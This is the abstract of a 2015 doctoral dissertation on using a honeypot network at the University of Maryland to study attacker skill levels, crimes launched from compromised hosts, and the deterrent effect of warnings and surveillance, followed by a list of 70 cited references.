Empirical studies based on Honeypots for Characterizing Attackers Behavior

Title of Document: EMPIRICAL STUDIES BASED ON HONEYPOTS FOR CHARACTERIZING ATTACKERS BEHAVIOR Bertrand Sobesto, Doctor of Philosophy, 2015 Directed By: Associate Professor Michel Cukier Reliability Engineering Program The cybersecurity community has made substantial efforts to understand and mitigate security flaws in information systems. Oftentimes when a compromise is discovered, it is difficult to identify the actions performed by an attacker. In this study, we explore the compromise phase, i.e., when an attacker exploits the host he/she gained access to using a vulnerability exposed by an information system. More specifically, we look at the main actions performed during the compromise and the factors deterring the attackers from exploiting the compromised systems. Because of the lack of security datasets on compromised systems, we need to deploy systems to more adequately study attackers and the different techniques they employ to compromise computer. Security researchers employ target computers, called honeypots, that are not used by normal or authorized users. In this study we first describe the distributed honeypot network architecture deployed at the University of Maryland and the different honeypot-based experiments enabling the data collection required to conduct the studies on attackers’ behavior. In a first experiment we explore the attackers’ skill levels and the purpose of the malicious software installed on the honeypots. We determined the relative skill levels of the attackers and classified the different software installed. We then focused on the crimes committed by the attackers, i.e., the attacks launched from the honeypots by the attackers. We defined the different computer crimes observed (e.g., brute-force attacks and denial of service attacks) and their characteristics (whether they were coordinated and/or destructive). We looked at the impact of computer resources restrictions on the crimes and then, at the deterrent effect of warning and surveillance. Lastly, we used different metrics related to the attack sessions to investigate the impact of surveillance on the attackers based on their country of origin. During attacks, we found that attackers mainly installed IRC-based bot tools and sometimes shared their honeypot access. From the analysis on crimes, it appears that deterrence does not work; we showed attackers seem to favor certain computer resources. Lastly, we observed that the presence of surveillance had no significant impact on the attack sessions, however surveillance altered the behavior originating from a few countries. EMPIRICAL STUDIES BASED ON HONEYPOTS FOR CHARACTERIZING ATTACKERS BEHAVIOR

[1]  Matti A. Hiltunen,et al.  DarkNOC: Dashboard for Honeypot Management , 2011, LISA.

[2]  Fabian Monrose,et al.  Authentication via keystroke dynamics , 1997, CCS '97.

[3]  Michel Cukier,et al.  RESTRICTIVE DETERRENT EFFECTS OF A WARNING BANNER IN AN ATTACKED COMPUTER SYSTEM , 2014 .

[4]  Rene B. P. Hesseling Theft from cars: reduced or displaced? , 1995 .

[5]  Ion Bica,et al.  RASSH - Reinforced adaptive SSH honeypot , 2014, 2014 10th International Conference on Communications (COMM).

[6]  Jarmo Ilonen Keystroke Dynamics , 2009, Encyclopedia of Biometrics.

[7]  Calton Pu,et al.  Evolutionary study of phishing , 2008, 2008 eCrime Researchers Summit.

[8]  Stefan Savage,et al.  An inquiry into the nature and causes of the wealth of internet miscreants , 2007, CCS '07.

[9]  U. Bayer,et al.  TTAnalyze: A Tool for Analyzing Malware , 2006 .

[10]  Lawrence W. Sherman,et al.  Defiance, Deterrence, and Irrelevance: A Theory of the Criminal Sanction , 1993 .

[11]  R. Clarke Situational Crime Prevention , 1995, Crime and Justice.

[12]  Michele Colajanni,et al.  HoneySpam: Honeypots Fighting Spam at the Source , 2005, SRUTI.

[13]  Alex R. Piquero,et al.  Differential Deterrence , 2012 .

[14]  R. Paternoster,et al.  The deterrent effect of the perceived certainty and severity of punishment: A review of the evidence and issues , 1987 .

[15]  Stephen Mason,et al.  A study of the relationship between antivirus regressions and label changes , 2013, 2013 IEEE 24th International Symposium on Software Reliability Engineering (ISSRE).

[16]  Kevin Curran,et al.  A Year in the Life of the Irish Honeynet: Attacked, Probed and Bruised but Still Fighting , 2004, Inf. Knowl. Syst. Manag..

[17]  Orin S. Kerr Vagueness Challenges to the Computer Fraud and Abuse Act , 2009 .

[18]  Andreas Terzis,et al.  A multifaceted approach to understanding the botnet phenomenon , 2006, IMC '06.

[19]  Marc Dacier,et al.  SGNET: Implementation insights , 2008, NOMS 2008 - 2008 IEEE Network Operations and Management Symposium.

[20]  A. Hovav,et al.  Does One Size Fit All? Examining the Differential Effects of IS Security Countermeasures , 2009 .

[21]  Dawn Xiaodong Song,et al.  Timing Analysis of Keystrokes and Timing Attacks on SSH , 2001, USENIX Security Symposium.

[22]  P. Brantingham,et al.  PREVENTING AUTO THEFT IN SUBURBAN VANCOUVER COMMUTER LOTS : EFFECTS OF A BIKE PATROL , 1996 .

[23]  Xuxian Jiang,et al.  Collapsar: A VM-based honeyfarm and reverse honeyfarm architecture for network attack capture and detention , 2006, J. Parallel Distributed Comput..

[24]  Marc Dacier,et al.  ScriptGen: an automated script generation tool for Honeyd , 2005, 21st Annual Computer Security Applications Conference (ACSAC'05).

[25]  Michael Vrable,et al.  Scalability, fidelity, and containment in the potemkin virtual honeyfarm , 2005, SOSP '05.

[26]  Robin Berthier,et al.  Profiling Attacker Behavior Following SSH Compromises , 2007, 37th Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN'07).

[27]  Peter E. Kennedy,et al.  Testing for Unit Roots: What Should Students Be Taught? , 2001 .

[28]  Brandon C. Welsh,et al.  Effects of Closed Circuit Television Surveillance on Crime , 2008 .

[29]  Henry L. Owen,et al.  The use of Honeynets to detect exploited systems across large enterprise networks , 2003, IEEE Systems, Man and Cybernetics SocietyInformation Assurance Workshop, 2003..

[30]  Farnam Jahanian,et al.  The Internet Motion Sensor - A Distributed Blackhole Monitoring System , 2005, NDSS.

[31]  Ying-Wong Cheung,et al.  Lag Order and Critical Values of the Augmented Dickey-Fuller Test , 1995 .

[32]  George Chamales The Honeywall CD-ROM , 2004, IEEE Security & Privacy Magazine.

[33]  George M. Mohay,et al.  Characterization of Attackers' Activities in Honeypot Traffic Using Principal Component Analysis , 2008, 2008 IFIP International Conference on Network and Parallel Computing.

[34]  Jie Yu,et al.  Enhancing host security using external environment sensors , 2011, International Journal of Information Security.

[35]  Van-Hau Pham,et al.  on the Advantages of Deploying a Large Scale Distributed Honeypot Platform , 2005 .

[36]  Marc Dacier,et al.  SGNET: A Worldwide Deployable Framework to Support the Analysis of Malware Threat Models , 2008, 2008 Seventh European Dependable Computing Conference.

[37]  W. Fuller,et al.  Distribution of the Estimators for Autoregressive Time Series with a Unit Root , 1979 .

[38]  Vincent Nicomette,et al.  A distributed platform of high interaction honeypots and experimental results , 2012, 2012 Tenth Annual International Conference on Privacy, Security and Trust.

[39]  Marc Dacier,et al.  Lessons learned from the deployment of a high-interaction honeypot , 2006, 2006 Sixth European Dependable Computing Conference.

[40]  Thorsten Holz,et al.  Rishi: Identify Bot Contaminated Hosts by IRC Nickname Evaluation , 2007, HotBots.

[41]  J. Gibbs Crime, punishment, and deterrence , 1975 .

[42]  Wei Zou,et al.  Characterizing the IRC-based Botnet Phenomenon , 2007 .

[43]  Kit Burden,et al.  Internet crime: Cyber Crime - A new breed of criminal? , 2003, Comput. Law Secur. Rev..

[44]  Ilir Gashi,et al.  Does Malware Detection Improve with Diverse AntiVirus Products? An Empirical Study , 2013, SAFECOMP.

[45]  Robin Berthier,et al.  Characterizing Attackers and Attacks: An Empirical Study , 2011, 2011 IEEE 17th Pacific Rim International Symposium on Dependable Computing.

[46]  Paul Hunton,et al.  The growing phenomenon of crime and the internet: A cybercrime execution and analysis model , 2009, Comput. Law Secur. Rev..

[47]  Ivan P. L. Png,et al.  Information Security: Facilitating User Precautions Vis-à-Vis Enforcement Against Attackers , 2009, J. Manag. Inf. Syst..

[48]  Steven Furnell,et al.  Cybercrime: Vandalizing the Information Society , 2003, ICWE.

[49]  Michel Cukier,et al.  Are Computer Focused Crimes Impacted by System Configurations? An Empirical Study , 2012, 2012 IEEE 23rd International Symposium on Software Reliability Engineering.

[50]  Jae-Kwang Lee,et al.  An Empirical Study of Spam and Spam Vulnerable email Accounts , 2007, Future Generation Communication and Networking (FGCN 2007).

[51]  Detmar W. Straub,et al.  Effective IS Security: An Empirical Study , 1990, Inf. Syst. Res..

[52]  Risto Kulmala,et al.  Effects of variable message signs for slippery road conditions on driving speed and headways , 2000 .

[53]  Marti A. Hearst,et al.  Why phishing works , 2006, CHI.

[54]  Jan Kohlrausch Experiences with the NoAH Honeynet Testbed to Detect new Internet Worms , 2009, 2009 Fifth International Conference on IT Security Incident Management and IT Forensics.

[55]  Evangelos P. Markatos,et al.  Comprehensive shellcode detection using runtime heuristics , 2010, ACSAC '10.

[56]  P. V. Oorschot,et al.  Revisiting Defenses against Large-Scale Online Password Guessing Attacks , 2012, IEEE Transactions on Dependable and Secure Computing.

[57]  Rui Xu,et al.  Defending against UDP Flooding by Negative Selection Algorithm Based on Eigenvalue Sets , 2009, 2009 Fifth International Conference on Information Assurance and Security.

[58]  Wuling Ren,et al.  On the Relevance of Spatial and Temporal Dimensions in Assessing Computer Susceptibility to System Trespassing Incidents , 2015 .

[59]  Marc Dacier,et al.  Empirical analysis and statistical modeling of attack processes based on honeypots , 2007, ArXiv.

[60]  Martin Roesch,et al.  Snort - Lightweight Intrusion Detection for Networks , 1999 .

[61]  Vasaka Visoottiviseth,et al.  Distributed Honeypot log management and visualization of attacker geographical distribution , 2011, 2011 Eighth International Joint Conference on Computer Science and Software Engineering (JCSSE).

[62]  M. Cusson,et al.  SITUATIONAL DETERRENCE : FEAR DURING THE CRIMINAL EVENT by , 2006 .

[63]  Thomas A. Loughran,et al.  Do individual characteristics explain variation in sanction risk updating among serious juvenile offenders? Advancing the logic of differential deterrence. , 2013, Law and human behavior.

[64]  Felix C. Freiling,et al.  Toward Automated Dynamic Malware Analysis Using CWSandbox , 2007, IEEE Secur. Priv..

[65]  Nathalie Weiler,et al.  Honeypots for distributed denial-of-service attacks , 2002, Proceedings. Eleventh IEEE International Workshops on Enabling Technologies: Infrastructure for Collaborative Enterprises.

[66]  S. Blank Can Information Warfare Be Deterred? , 2001 .

[67]  Gary S. Green,et al.  GENERAL DETERRENCE AND TELEVISION CABLE CRIME: A FIELD EXPERIMENT IN SOCIAL CONTROL* , 1985 .

[68]  Jose Nazario,et al.  PhoneyC: A Virtual Client Honeypot , 2009, LEET.

[69]  Robin Berthier,et al.  Analyzing the process of installing rogue software , 2009, 2009 IEEE/IFIP International Conference on Dependable Systems & Networks.

[70]  L. Spitzner,et al.  Honeypots: Tracking Hackers , 2002 .